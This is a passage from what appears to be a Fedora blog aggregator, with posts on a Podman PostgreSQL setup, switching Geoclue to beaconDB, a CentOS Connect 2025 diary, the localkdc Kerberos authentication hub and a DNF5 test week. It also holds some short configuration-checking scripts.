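    format=$(git config --file "$cfg" --get gpg.format || true)
    if [ -n "$format" ] && [ "$format" != "openpgp" ]; then
        echo "gpg.format is '$format': gpg.program is ignored for this format"
        findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ]
)
```

Run it against the file that `git config --global` writes to, normally ~/.gitconfig; a repository-level .git/config can override these values and can be checked the same way.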

New badge: SCaLE 22x Attendee !

Posted by Fedora Badges on 2025-02-10 16:56:29 UTC
SCaLE 22x Attendee

You dropped by the Fedora booth at SCaLE 22x!

Running PostgreSQL with Podman and volume

Posted by Christiano Anderson on 2025-02-10 11:48:24 UTC
This is a short snippet to run PostgreSQL using Podman with a volume. The snippet has been tested on Fedora 41.

Create the Podman volume

$ podman volume create psqldevel

Run PostgreSQL

$ podman run -d -p 5432:5432 -v psqldevel:/var/lib/postgresql/data -e POSTGRES_PASSWORD=xx --name psqldevel postgres:latest

Next Open NeuroFedora meeting: 10 February 2025 1300 UTC

Posted by Ankur Sinha on 2025-02-10 09:24:05 UTC

Photo by William White on Unsplash.


Please join us at the next regular Open NeuroFedora team meeting on Monday 10 February 2025 at 1300 UTC. The meeting is a public meeting, and open for everyone to attend. You can join us in the Fedora meeting channel on chat.fedoraproject.org (our Matrix instance). Note that you can also access this channel from other Matrix home servers, so you do not have to create a Fedora account just to attend the meeting.

You can use this link to convert the meeting time to your local time. Or, you can also use this command in the terminal:

$ date -d 'Monday, February 10, 2025 13:00 UTC'

The meeting will be chaired by @ankursinha. The agenda for the meeting is:

We hope to see you there!

The state of the Location permission on Fedora Linux in 2025

Posted by Fedora Magazine on 2025-02-10 08:00:00 UTC

This article will discuss the state of finding your current geographical location in the Fedora Linux environment.

Background

For many mobile devices it is useful to get the current location. This is usually done using a GPS sensor, where the coordinates (latitude and longitude as given by the satellites) allow for step-by-step directions to the desired destination.

However, sometimes using the GPS isn’t desirable. This may be due to the high battery usage, or sometimes the device doesn’t have a GPS sensor at all. Even more interesting, the user might hit a GPS sensor limitation (such as being indoors) meaning there is a need for a secondary way to detect location to either replace or augment the GPS data.

But, what would that secondary source of data be? The alternative source needs to be some public data that is available for everyone, and we do have those! There are Wifi network identifiers, mobile cell towers data, and Bluetooth beacons. All of these are broadcast constantly, or almost constantly.

Using these alternative sources the user accepts the service of a location service provider (for example, Google Location Services provided by Google on Android). The provider has their own database of the specified device identifiers along with their approximate location. When making a location request the Wifi, Bluetooth, and cell identifiers are sent with the request and the location provider sends back coordinates. In addition they provide the precision of the coordinates based on an average of the locations available from the data in the database.

Of course, there is always the third option of combining both approaches in a way that fits the precision needed for the task. As an example, Google calls this combined approach Fused Location which is provided in their proprietary Google Play Services.

Ok, that is how it generally works and how mobile devices do it. But what about Linux?

So, how does it work on Linux?

In Linux, the software responsible for handling the location requests is Geoclue. As the Geoclue project puts it:

Geoclue is a D-Bus service that provides location information. The goal of the Geoclue project is to make creating location-aware applications as simple as possible.

Geoclue is capable of, among other things:

  • Support for location data based on Wifi (via wpa_supplicant integration. This uses Mozilla Location Service (MLS) by default)
  • Support for location data using GPS (if available)
  • Support for location data using mobile modems (via ModemManager integration)
  • GeoIP support (fallback mode)

Previously the Mozilla Location Service (MLS) was the default location service used under Linux. Unfortunately, in March 2024, Mozilla announced the project was being discontinued, making it necessary to switch to an alternative.

Mozilla Location Services and Ichnaea

Mozilla’s no longer available service called “Mozilla Location Services” (MLS) utilized the open source Ichnaea software. The service was capable of both receiving submitted user-data as well as responding with the approximate location based on user requests.

For submitting new data, users could use a “stumbler” application. This was able to collect cell data, Wifi data and Bluetooth beacons, associate them with their location, and submit them to MLS or another Ichnaea-compatible service.

Users would utilize the collected data by having their system (in the case of Linux or some Android ROMs using MLS) send the info about the radio devices in range and receive back info about the approximate location.

MLS alternatives and setup

Although there are many possible MLS alternatives (as long as they maintain Ichnaea compatibility), the main alternative these days is beaconDB.

To set up beaconDB, set the URL to https://api.beacondb.net/v1/geolocate.

Or as adapted from their website:

$ sudo mkdir -p /etc/geoclue/conf.d
$ sudo nano /etc/geoclue/conf.d/99-beacondb.conf

Put the following into the file:

[wifi]
enable=true
url=https://api.beacondb.net/v1/geolocate

Then reload Geoclue:

$ sudo systemctl reload geoclue

After restarting Geoclue you should have access to beaconDB.
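
Because the configured URL is where nearby Wifi identifiers are sent, it is worth checking which endpoint is actually in effect. The following is an added example, not taken from beaconDB or Geoclue; the function names are hypothetical, and it assumes that drop-ins in conf.d are read after geoclue.conf in sorted filename order, with a later value overriding an earlier one.

```sh
# Added example. ROOT stands in for /etc/geoclue: it holds geoclue.conf and
# conf.d/*.conf. Assumption: drop-ins are applied after geoclue.conf in sorted
# filename order and a later "url" in [wifi] overrides an earlier one.

# geoclue_wifi_url ROOT: print the effective url= of the [wifi] section.
geoclue_wifi_url() (
    root=$1
    url=
    for f in "$root/geoclue.conf" "$root"/conf.d/*.conf; do
        [ -f "$f" ] || continue          # also skips an unmatched glob
        found=$(awk '
            /^[ \t]*[#;]/ { next }       # comment lines
            /^[ \t]*\[/ {                # section header such as [wifi]
                section = $0
                sub(/^[ \t]*\[/, "", section)
                sub(/\].*$/, "", section)
                next
            }
            section == "wifi" && /^[ \t]*url[ \t]*=/ {
                sub(/^[^=]*=[ \t]*/, "") # drop the key and the equals sign
                sub(/[ \t]+$/, "")       # drop trailing whitespace
                value = $0
            }
            END { print value }
        ' "$f")
        if [ -n "$found" ]; then
            url=$found
        fi
    done
    printf '%s\n' "$url"
)

# check_geoclue_wifi ROOT: report the endpoint; fail when it is missing or
# would send the Wifi scan data over plain HTTP.
check_geoclue_wifi() (
    url=$(geoclue_wifi_url "$1")
    case $url in
        https://*) echo "Wifi scan data is sent to: $url" ;;
        '')        echo "no [wifi] url set under $1"; exit 2 ;;
        *)         echo "Wifi url is not HTTPS: $url"; exit 1 ;;
    esac
)
```

On a real system the call is `check_geoclue_wifi /etc/geoclue`.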

A future article will focus on submitting new data, this might require an Android phone.

Notes

  • If there’s not enough data for your region yet, you might not have a very good experience. Consider looking at the beaconDB map before making the switch or submitting data for your region.
  • The Geoclue integration with Wifi networks requires wpa_supplicant, since currently only a wpa_supplicant backend exists. This means iwd users won’t be able to use Geoclue correctly since there is no Geoclue iwd support and no Wifi data will be sent. Instead, a fallback to beaconDB’s GeoIP implementation will occur.
  • There is a chance beaconDB’s implementation of GeoIP might be worse than Geoclue’s own implementation. This could be explained by geoclue currently relying on Google, although in the future it will switch to using reallyfreegeoip. This will be noticed if city-level locations are not precise, such as showing the location a few cities away from the user’s actual location.

Day One - CentOS Connect 2025

Posted by Akashdeep Dhar on 2025-02-09 18:30:00 UTC

The first day of my presence at CentOS Connect 2025 began as early as 0600am Central European Time on 30th January 2025. As the first half of that day mostly consisted of some meetups from Hyperscale SIG, Alternative Images SIG, AlmaLinux Elevate and the OKD team, I decided that I would try to make it to the venue by 1100am Central European Time. I wanted to help with the organizational efforts of CentOS Connect 2025 and represent the Fedora Project community at the event venue. Sumantro Mukherjee and I headed down at around 0730am Central European Time for breakfast where we met with Greg Sutcliffe and Luis Bazan. Amidst all the wisecracking about Greg's pink-coloured water bottle, Justin W. Flory and Bhagyashree Padalkar joined us at the dining place to join Greg on their way to CHAOSScon EU 2025 at Bedford Hotels & Congress Centre.

I found this in the elevator at the Moxy Brussels City Center hotel and it is as if the selfie-taking event was manifested by someone else

After a brief introduction with Bhagyashree before their departure, I realized that Greg had left his pink-coloured water bottle and sprinted outside to catch up with Greg who headed inside at the same time with the same realization. With the handover complete, I discussed the plans to head to the CentOS Connect 2025 event venue with Sumantro and Luis where Luis decided to head away in advance while the both of us decided to delay our departure by at least 0930am Central European Time. The shop that we were planning to visit during the first half of the day named Ichiban was opening at around 1000am Central European Time and was on the way between the event venue at DoubleTree by Hilton Brussels City and our hotel, Moxy Brussels City Center. We soon departed on bus number #71 bound for De Brouckère from a nearby bus stop and got off one stop before the designated point.

What Sumantro and I thought would be a "quiet bus ride" ended up being a "quiet bus ride" to the destination - Sometimes boring is amazing

The rain that morning was a lot worse than the one that Sumantro and I experienced the previous night. While we previously were considering heading to the event venue on foot, we quickly decided to use a bus instead. On our way from the destination stop to the Ichiban store, we also passed through the Hotel Marivaux which we stayed at during my first trip to FOSDEM in 2023. We swiftly made it to the Ichiban store where Sumantro explored some Goku figurines from the Dragon Ball Z (1989) anime and I was finally able to find some Manga books in English. As the selection did not match my expectations, Sumantro and I decided to head out after purchasing a couple of imported merchandise from Japan like quaint-themed Fanta drinks and some Anime themed Sakuma Drops from the popular Naruto (2007) anime and acclaimed Ansatsu Kyoushitsu (2015) anime.

Some more walking through towards the event venue and we soon found ourselves around the DoubleTree by Hilton Brussels City hotel where CentOS Connect 2025 was organized. This was also the place that I was staying in to attend the FOSDEM fringe events in 2024 so I felt this sense of familiarity with the place. What helped with the familiarity more was the sight of Carl W. George and Dorka Volavkova at the CentOS Connect 2025 reception desk at around 1030am Central European Time. For Carl - going as far as hugging me when I was super soaked from rain was "no big deal" and it was indeed great meeting him after a long time. Sumantro and I got ourselves the event badges along with CentOS Project themed tee shirts while we were at the desk. While we were at the desk, I noticed the SyncStar postcards that I worked to design and Dorka helped with printing from Brno.

I was grateful that Dorka managed to get these resources printed when these were turned in late to her because of the delays due to the confusion around the availability of Fedora Project themed USB flash drives for giveaways. SyncStar is a service that I developed by taking inspiration from an existing but unmaintained tool called Fedorator to help with creating bootable media at conference kiosks. Although there was this one thing that I was bummed about and that was the fact the CentOS Project-themed USB flash drives that were being given away were manually flashed with the recently released CentOS Stream 10 when SyncStar could have easily been of help with making the process convenient. After all, SyncStar was nothing but a fancy wrapper around GNU DD with asynchronous process queues written in Python and a responsive web interface written in ReactJS.

SyncStar postcards among USB flash drives with CentOS Stream 10 at the CentOS Connect 2025 event desk for the event attendees

After leaving my coat to dry in the Chestnut Hall, I ran into Brian Exelbierd who also seemed to have arrived around the same time. It was great catching up with him after a long time and after leaving the conversation to Sumantro, I started working on setting up the YAML file to configure the SyncStar utility at the reception desk. Carl and I struggled briefly with the hotel WiFi as I wanted my laptop to execute the service headlessly and Carl's laptop to exhibit the web interface before deciding to use Cloudflare Tunnels for the purpose. The final deployment was configured to be served through the Cloudflare network on the hostname syncstar.gridhead.net which surprised Carl as he thought that the hostname was limited to the local network only. I caught up with Shaun McCance as well following the conversations around their move to GitLab with Fabian Arrotin.

Digital display of schedule for all the presentation events to take place on the second half of the first day of CentOS Connect 2025

Alongside the Fedora Project, the CentOS Project seemed to have also decided to move away from Pagure and hence, the assets on their current deployment of Package Sources and Project Collections had to be reliably exported over to GitLab. I maintained a project named Pagure Exporter for the Fedora Infrastructure team and I volunteered my support to help with the CentOS Project's migration from Pagure to GitLab. While my primary focus then was to introduce the support for Forgejo that the Fedora Council decided for the community to move over to - there was no need to reinvent the wheel with another project when the existing one could be extended. Once done with the exchange, I ran into Sherif Nagy and Neil Hanlon from the Rocky Enterprise Software Foundation and David Cantrell who represented the Fedora Engineering Steering Committee in the Fedora Council.

Purchasing an extra orange-flavoured Fanta soda can among other Japanese imported products at the Ichiban store earlier that morning was a wise thing to do as that ended up coming in handy when David mentioned his struggle with the caffeine intake since the morning. Saving him a trip downstairs for a purchase, I caught up in conversations with him when the both of us ran into Matthew Miller who had just arrived at the venue at around 0100pm Central European Time. After a small chat with him and Amy Marrich at the reception area, they left for a meeting with Shaun and Carl so I decided to help out with the event reception area with Dorka. She provided me with a swift and effective walkthrough of what had to be done and once I relocated my stuff to the cloakroom for event organizers and speakers, I started helping out with the event registrations there.

Dorka mentioned her plans to come to India for DevConf.IN in Pune - which was great because we were also planning on organizing a Fedora Project booth at the event. We were soon joined by Luis whose wisecracking kept things interesting as we were getting folks registered at the reception. Among some folks I helped register, I caught up with the likes of Alexandra Fedorova whom I was meeting after the previous Fedora Council F2F Meeting in 2024 and Fabio Valentini whom I was meeting for the first time. While getting David Fan and Jess Chitas registered, he mentioned liking my Instagram stories about my adventures through various anime stores in Brussels and planning on heading out together whenever after the event. At around 0130pm Central European Time, I decided to grab a Greek Bowl meal with chicken salad that was served for the lunch meal at the event venue.

From left to right - Luis, Dorka and I goofing around at the CentOS Connect 2025 reception desk in the afternoon when we got some breathing room after the slight decrease in the entry footfall

Fabian arrived at CentOS Connect 2025 around the same time and I caught up with him, Frantisek Lachman and Alexandra in conversations who were present around the reception desk. At around 0200pm Central European Time, the presentations at the event began with an opening statement from Shaun - I started attending some talks while working on some recently noticed changes on the SyncStar project. The inexpensive USB flash drives used for the giveaways did not have unique hardware identifiers and hence, it was difficult to discern among multiple USB flash drives of the same type. Sumantro and I worked on brainstorming solutions (read as workarounds) with which we can retain the information about the USB flash drives plugged into the kiosk device, all while tuning into talks delivered by Troy Dawson, Dennis Gilmore and Joel Capitao in the Chestnut Hall.

At around 0500pm Central European Time, after spending some time brainstorming and coming up with solutions that have some kind of compromises, Sumantro and I decided to call it a day and head back to the hotel. On our way out, we met up with Daniel Mellado and Mikel Olasagasti before we took a selfie with Alexandra, Brian and Dennis to close out the first day of CentOS Connect 2025. Coincidentally, we ran into Matthew and David at the dining area of the event venue so after waving David goodbye, the three of us "tailgated" our way out of the rear exit of the DoubleTree by Hilton Brussels City. On our way through the Rogier station to the train that we were supposed to catch for Port De Namur station, Sumantro and I discussed with Matthew about his tentative yet eager plans to visit India for the first time to represent the Fedora Project during DevConf.IN 2025.

From left to right - (Neal Gompa, Richard Brown), Sumantro, myself, Alexandra and Brian in a selfie right before Sumantro and I were heading out of the event

We had a report of belongings being stolen from one of the Fedora Project community members during their travels so we took that as a learning to be extra careful about our surroundings whenever we were travelling in crowded trains like we did that time. After all, the last thing that you would want when you are travelling in a different country is for your important belongings like wallet, passport or smartphone to be stolen - I was worried about whoever was affected. After getting off at the Port De Namur station at around 0530pm Central European Time, we walked back to the Moxy Brussels City Center hotel. I connected with Matthew asynchronously after resting for a while and dropped a bag of Indian snacks in his hotel room about an hour later. As Sumantro was occupied with his work, I decided to head out alone to get a takeaway from the Belchicken outlet for dinner.

You can clearly not have enough selfies with Sumantro, David and Matthew when you are at a community event with as much of a hustle and bustle as CentOS Connect 2025

I heard back from Amita Sharma on the way back to the hotel who was working with Rajan Shah for last minute approval on the Fedora Project booth so I knew that I had to start working on the planning as soon as possible. I had to ensure that I was ready with the statistical budget estimate for travel and accommodation for the representatives from the Fedora Project required for pulling off such an event. Imagine leading the planning of yet another Fedora Project event all while representing the community at the FOSDEM 2025 fringe - Talk about being crazy enough to take this up! As audacious of a plan as it was, I was able to get together an estimated action and projected estimate for the required budget on a document after I was swiftly done with my dinner. All I had to do next was to present this to Justin on the next day before reverting to Rajan and Amita with a confirmation.

While the Rogier station looked empty in this photograph, it was about to get super crowded with people when we took the train number #6 to the Port De Namur station

Looking back at the situation I was dealt with late in the evening at around 0830pm Central European Time when I was almost out of my juice - one half of me wanted to call it a day while the other half of me wanted to push through with the planning. In hindsight - I am glad that the other half took precedence because I like to think that exemplary actions in exigent moments like these end up creating a difference in free and open source software communities. After messaging Justin to reserve some time from his busy schedule and checking with Dorka to see if we could get some assistance from her end, I took inputs on the budget from Samyak Jain who was available until late. At around 1000pm Central European Time, I decided to head to bed and use the next day to make the best use of the stakeholders present in person at the CentOS Connect 2025 event to progress the planning.

Local authentication hub

Posted by Alexander Bokovoy on 2025-02-09 11:00:00 UTC

FOSDEM 2025 is just behind us and it was a great event. I had a chance to talk about the local authentication hub project. The talk was well received and I got a lot of questions about the project. We ran Identity and Access Management devroom for the second time in a row and it was a great success. I had two talks at the IAM devroom, both were process reports on the activity we have announced at FOSDEM 2024. Now that recordings of both talks are published, I can share articles which go into more details.

Local authentication hub

Our FOSDEM talk is “localkdc - a general local authentication hub”. You can watch it and come back here for more details.

But before going into details, let me provide a bit of a background. It is 2025 now and we should go almost three decades back (ugh!).

History dive

Authentication on Linux systems is interwoven with the identity of the users. Once a user logged in, a process is running under a certain POSIX account identity. Many applications validate the presence of the account prior to the authentication itself. For example, the OpenSSH server does check the POSIX account and its properties and if the user was not found, will intentionally corrupt the password passed to the PAM authentication stack request. An authentication request will fail but the attempt will be recorded in the system journal.

This joint operation between authentication and identification sources in Linux makes it important to maintain a coherent information state. No wonder that in corporate environments it is often handled centrally: user and group identities stored at a central server and sourced from that one by a local software, such as SSSD. In order to consume these POSIX users and groups, SSSD needs to be registered with the centralized authority or, in other words, enrolled into the domain. Domain enrollment allows not only identity and authentication of users: both the central server and the enrolled client machine can mutually authenticate each other and be sure they talk to the right authority when authenticating the user.

FreeIPA provides a stable mechanism for building a centralized domain management system. Each user account has POSIX attributes associated with it and each user account is represented by the Kerberos principal. Kerberos authentication can be used to transfer the authentication state across multiple services and provides a chance for services to discover user identity information beyond POSIX. It also makes strong linking between the POSIX level identity and authentication structure possible: for example, a Kerberos service may introspect a Kerberos ticket presented by a user’s client application to see how this user was authenticated originally: with a password or some specific passwordless mechanism. Or, perhaps, that a client application performs operations on behalf of the user after claiming it was authenticated using a different (non-Kerberos) authentication.

Local user accounts’ use lacks this experience. Each individual service needs to reauthenticate a user again and again. Local system login: authenticate. Elevating privileges through SUDO? Authenticate again, if not explicitly configured otherwise. Details of the user session state, like how long this particular session is active, are not checked by the applications, making it also harder to limit access. There is no information on how this user was authenticated. Finally, overall user experience between local (standalone) authentication and domain-enrolled one differs, making it harder to adjust and educate users.

Local authentication is also typically password-based. This is not a bad thing in itself but depending on applications and protocols, worse choices could be made, security-wise. For example, contemporary SMB 3.11 protocol is quite secure if authenticated using Kerberos. For non-Kerberos usage, however, it is left to rely on NTLM authentication protocol which requires use of RC4 stream cipher. There are multiple attacks known to break RC4-based encryption, yet it is still used in the majority of non-domain joined communications using SMB protocol simply because there was no (so far) alternative. To be correct, there was always an alternative, use of Kerberos protocol, but setting it up for individual isolated systems wasn’t practical.

The Kerberos protocol assumes the use of three different parties: a client, a service, and a key distribution center (KDC). In corporate environments a KDC is part of the domain controller system, a client and a service are both domain members, computers are enrolled in the domain. The client authenticates to KDC and obtains a Kerberos ticket granting ticket (TGT). It then requests a service ticket from the KDC by presenting its TGT and then presents this service ticket to the service. The service application, on its side, is able to decrypt the service ticket presented by the client and authenticate the request.

In the late 2000s Apple realised that for individual computers the number of user accounts is typically small and a KDC can be run as a service on the individual computer itself. When both the client and server are on the same computer, this works beautifully. The only problem is that when a user needs to authenticate to a different computer’s service, the client cannot reach the KDC hosted on the other computer because it is not exposed to the network directly. Luckily, MIT Kerberos folks already thought about this problem a decade prior to that: in 1997 a first idea was published for a Kerberos extension that allowed tunneling Kerberos requests over a different application protocol. This specification became later known as “Initial and Pass Through Authentication Using Kerberos V5 and the GSS-API” (IAKerb). An initial implementation for MIT Kerberos was done in 2009/2010 while Apple introduced it in 2007 to enable remote access to your own Mac across the internet. It came in MacOS X 10.5 as a “Back to My Mac” feature and even got specified in RFC 6281, only to be retired from MacOS in 2019.

Modern days

In the 2020s Microsoft continued to work on NTLM removal. In 2023 they announced that all Windows systems will have a local KDC as their local authentication source, accessible externally via selected applications through the IAKerb mechanism. By the end of 2024, we have only seen demos published by Microsoft engineers at various events but this is a promising path forward. Presence of the local KDC in Windows raises an interoperability requirement: Linux systems will have to handle access to Windows machines in a standalone environment over SMB protocol. Authentication is currently done with NTLM, it will eventually be removed, thus we need to support the IAKerb protocol extension.

The NTLM removal for Linux systems requires several changes. First, the Samba server will need to learn how to accept authentication with the IAKerb protocol extension. Then, Samba client code needs to be able to establish a client connection and advertise IAKerb protocol extension. For kernel level access, the SMB filesystem driver needs to learn how to use IAKerb as well, this will also need to be implemented in the user space cifs-utils package. Finally, to be able to use the same feature in a pure Linux environment, we need to be able to deploy Kerberos KDC locally and do it in an easy manner on each machine.

This is where we had an idea. If we are going to have a local KDC running on each system, maybe we should use it to handle all authentication and not just for the NTLM removal? This way we can make both the local and domain-enrolled user experience the same and provide access locally to a whole set of authentication methods we support for FreeIPA: passwords, smartcards, one-time passwords and remote RADIUS server authentication, use of FIDO2 tokens, and authentication against an external OAuth2 Identity Provider using a device authorization grant flow.

How “local” should a local KDC be?

On standalone systems it is often not desirable to run daemons continuously. Also, it is not desirable to expose these services to the connected network if they really don’t need to be exposed. A common approach to solve this problem is by providing a local inter-process communication (IPC) mechanism to communicate with the server components. We chose to expose a local KDC via UNIX domain sockets. A UNIX domain socket is a well-known mechanism and has known security properties. With the help of a systemd feature called socket activation, we also can start local KDC on demand, when a Kerberos client connects over the UNIX domain socket. Since on local systems actual authentication requests don’t happen often, this helps to reduce memory and CPU usage in the long run.
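An added example (not code from the post or from localkdc) of the two properties this paragraph relies on: the socket-activation handoff that sd_listen_fds(3) describes, and the kernel-recorded identity of the peer on a UNIX domain socket (Linux `SO_PEERCRED`). The socket path, the function names and the use of a stream socket are assumptions made for the demonstration.

```python
import os
import socket
import stat
import struct
import tempfile

SD_LISTEN_FDS_START = 3  # systemd passes activated sockets starting at fd 3


def activated_fds(environ, pid):
    """Descriptors handed over by the service manager, as sd_listen_fds(3) reads them.

    LISTEN_PID must name this process; LISTEN_FDS is the number of
    descriptors passed, numbered from fd 3 upwards.
    """
    try:
        if int(environ.get("LISTEN_PID", "")) != pid:
            return []  # the variables were meant for another process
        count = int(environ.get("LISTEN_FDS", ""))
    except ValueError:
        return []  # not started through socket activation
    return list(range(SD_LISTEN_FDS_START, SD_LISTEN_FDS_START + max(count, 0)))


def adopt_unix_listener(fd):
    """Wrap an inherited fd, refusing anything but a listening AF_UNIX stream socket."""
    if not stat.S_ISSOCK(os.fstat(fd).st_mode):
        raise ValueError("fd %d is not a socket" % fd)
    sock = socket.socket(fileno=os.dup(fd))  # family and type are auto-detected
    listening = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ACCEPTCONN)
    if sock.family != socket.AF_UNIX or sock.type != socket.SOCK_STREAM or not listening:
        sock.close()
        raise ValueError("fd %d is not a listening AF_UNIX stream socket" % fd)
    return sock


def peer_credentials(conn):
    """(pid, uid, gid) of the connecting process, recorded by the kernel at connect time."""
    raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, struct.calcsize("iII"))
    return struct.unpack("iII", raw)


def demo():
    """Play all roles in one process: service manager, client and on-demand service."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "kdc.sock")  # constructed path, not the localkdc one
        # Service-manager side: the socket exists before the service is running.
        manager = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        old_umask = os.umask(0o177)  # socket file is created with mode 0600
        try:
            manager.bind(path)
        finally:
            os.umask(old_umask)
        manager.listen(1)
        mode = stat.S_IMODE(os.stat(path).st_mode)

        # Client side: the connection is queued although nobody has called accept() yet.
        client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        client.connect(path)

        # Service side, started on demand: adopt the inherited descriptor and serve.
        # manager.fileno() stands in for fd 3 of a real activated service.
        listener = adopt_unix_listener(manager.fileno())
        conn, _ = listener.accept()
        creds = peer_credentials(conn)
        for s in (conn, client, listener, manager):
            s.close()
        return mode, creds


if __name__ == "__main__":
    print(demo())
```

In a systemd `.socket` unit the permissions of the socket file are set with `SocketMode=` rather than through the umask.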

If a local KDC is only accessible over a UNIX domain socket, remote applications could not get access to it directly. This means they would need to have help from a server application that can utilize the IAKerb mechanism to pass through the communication between a client and the KDC. It would enable us to authenticate as a local user remotely from a different machine. Due to how the IAKerb mechanism is designed and integrated into GSS-API, this only allows password-based authentication. Anything that requires passwordless methods cannot obtain initial Kerberos authentication over IAKerb, at least at this point.

Here is a small demo on Fedora, using our localkdc tool to start a local KDC and obtain a Kerberos ticket upon login. The tickets can then be used effortlessly to authenticate to local services such as SUDO or Samba. For remote access we rely on Samba support for IAKerb and authenticate with GSSAPI but local smbclient uses a password first to obtain the initial ticket over IAKerb. This is purely a limitation of the current patches we have to Samba.

Make a pause here and think about the implications. We have an initial Kerberos ticket from the local system. The Kerberos ticket embeds details of how this authentication happened. We might have used a password to authenticate, or a smartcard. Or any other supported pre-authentication methods. We could reuse the same methods FreeIPA already provides in the centralized environment.

The Kerberos ticket also can contain details about the user session, including up to date group membership. It does not currently have that in the local KDC case but we aim to fix that. This ticket can be used to authenticate to any GSS-API or Kerberos-aware service on this machine. If a remote machine accepts Kerberos, it theoretically could accept a ticket presented by a client application running on the local machine as well. Only, to do that it needs to be able to communicate with our local KDC and it couldn’t access it.

Trust management

Luckily, a local KDC deployment is a full-featured Kerberos realm and thus can establish cross-realm agreements with other Kerberos realms. If two “local” KDC realms have trust agreements between each other, they can issue cross-realm Kerberos tickets which applications can present over IAKerb to the remote “local” KDC. Then a Kerberos ticket to a service running on the target system can be requested and issued by the system’s local KDC.

Thus, we can achieve passwordless authentication locally on Linux systems and have the ability to establish peer to peer agreements across multiple systems, to allow authentication requests to flow and operate on commonly agreed credentials. A problem now moves to the management area: how to manage these peer to peer agreements and permissions in an easy way?

Systemd User/Group API support

MIT Kerberos KDC implementation provides a flexible way to handle Kerberos principals’ information. A database backend (KDB) implementation can be dynamically loaded and replaced. This is already used by both FreeIPA and Samba AD to integrate MIT Kerberos KDC with their own database backends based on different LDAP server implementations. For a local KDC use case running a full-featured LDAP server is not required nor intended. However, it would be great if different applications could expose parts of the data needed by the KDB interfaces and cooperate together. Then a single KDB driver implementation could be used to streamline and provide uniform implementation of Kerberos-specific details in a local KDC.

One of the promising interfaces to achieve that is the User/Group record lookup API via varlink from systemd. Varlink allows applications to register themselves and listen on UNIX domain sockets for communication similar to D-Bus but with much less implementation overhead. The User/Group API technically also allows merging data coming from different sources when an application requests the information. “Technically”, because the io.systemd.Multiplexer API endpoint currently does not support merging non-overlapping data representing the same account from multiple sources. Once that becomes possible, we could combine the data dynamically and may interact with users on demand when corresponding requests come in. Or we can implement our own blending service.

Blending data requests from multiple sources within MIT KDC needs a specialized KDB driver. We certainly don’t want this driver to duplicate the code from other drivers, so making these drivers stackable would be a good option. Support for one level of stacking has been merged to MIT Kerberos through a quickly processed pull request and will be available in the next MIT Kerberos release. This allows us to have a single KDB driver that loads other drivers specialized in storing Kerberos principals and processing additional information like MS-PAC structure or applying additional authorization details.

Establishing trusts

If Alice and Bob are in the same network and want to exchange some files, they could do this using SMB and Samba. But so that Alice can authenticate on Bob’s machine, they would need to establish a Kerberos cross-realm trust. With the current tooling this is a complex task. For users we need to make this more accessible. We want to allow users to request trust on demand and validate these requests interactively. We also want to allow trust to be present for a limited timeframe, automatically expiring or manually removed.

If we have a Kerberos principal lookup on demand through a curated varlink API endpoint, we also can have a user-facing service to initiate establishing the trust between two machines on demand. Imagine a user trying to access SMB share on one desktop system that triggers a pop-up to establish trust relationship with a corresponding local KDC on the remote desktop system. Both owners of the systems would be able to communicate out of band that provided information is correct and can be trusted. Once it is done, we can return back the details of the specific Kerberos principal that represents this trust relationship. We can limit lifetime of this agreement so that it would disappear automatically in one hour or a day, or a week.

Current state of local authentication hub

We started with two individual implementation paths early in 2024:

  • support IAKerb in MIT Kerberos and Samba
  • enable MIT Kerberos to be used locally without network exposure

MIT Kerberos has had support for the IAKerb protocol extension for more than a decade, but since Microsoft introduced some changes to the protocol, those changes needed to be integrated as well. This was completed during summer 2024, though no upstream release is available yet. MIT Kerberos typically releases new versions yearly in January so we hope to get some updates early 2025.

Samba integration with IAKerb is currently under implementation. Originally, Microsoft was planning to release Windows 11 and Windows Server 2025 with IAKerb support enabled during autumn 2024. However, the Windows engineering team faced some issues and IAKerb is still not enabled in the Windows Server 2025 and Windows 11 releases. We are looking forward to getting access to Windows builds that enable IAKerb support to ensure interoperability before merging Samba changes upstream. We also need to complete the Samba implementation to properly support locally-issued Kerberos tickets and not only do acquisition of the ticket based on the password.

Meanwhile, our cooperation with MIT Kerberos development team led to advancements in the local KDC support. The MIT Kerberos KDC can now be run over a UNIX domain socket. Also on systemd-enabled systems we allow socket activation, transforming local KDC into an on-demand service. We will continue our work on a dynamic database for a local KDC, to allow on-demand combination of resources from multiple authoritative local sources (Samba, FreeIPA, SSSD, local KDC, future dynamic trust application).

For experiments and ease of deployments, a new configuration tool was developed, localkdc. The tool is available at localkdc and COPR repository can be used to try the whole solution on Fedora.

If you want to try this in a simple setup, you might be interested in a tool that we developed initially for FreeIPA: FreeIPA local tests. This tool allows provisioning and running a complex test environment in podman containers. The video of the local KDC usage was actually generated automatically by the scripts from https://github.com/abbra/freeipa-local-tests/tree/main/ipalab-config/localkdc.

Contribute to GNOME Software with DNF5 Test Day

Posted by Fedora Magazine on 2025-02-08 18:36:49 UTC

The DNF5 team is working on ironing out bugs around matching the existing functionality of GNOME Software with PackageKit. The DNF and QA teams have organized a test week from Monday, February 10, 2025 to Monday, February 17, 2025. The wiki page in this article contains links to the test images you’ll need to participate. Please continue reading for details.

How does a test week work?

A test week is an event where anyone can help ensure that changes to the basic functionality of GNOME Software work well in an upcoming release. Fedora community members often participate, and the public is welcome at these events. If you’ve never contributed before, this is a perfect way to get started.

To contribute, you only need to be able to do the following things:

  • Download test materials, which include some large files
  • Read and follow directions step by step

The wiki page for the kernel test week has a lot of good information on what and how to test. After you’ve done some testing, you can log your results in the test week web application.

Happy testing, and we hope to see you on one of the test days.

Bits from early February 2025

Posted by Kevin Fenzi on 2025-02-08 16:58:43 UTC

Let's keep the blogging rolling. This week went by really fast, but a lot of it for me was answering emails and pull requests and meetings. Those are all important, but sometimes it makes it seem like not much was actually accomplished in the week.

riscv secondary koji hub

I got some x86 buildvms set up. These are to do tasks that don't need to be done on a riscv builder, like createrepo/newrepos or the like. I'm still having an issue with auth on them however, which is related to the auth issue with the web interface. Will need to get that sorted out next week.

f42 branching day

Tuesday was the f42 branching day. It went pretty smoothly this cycle I think, but there's always a small number of things to sort out. It's really the most complex part of the release cycle for releng. So many moving parts and disparate repos and configs needing changing. This time I tried to stay out of actually doing anything, in favor of just providing info or review for Samyak who was doing all the work. I mostly managed to do that.

Datacenter move

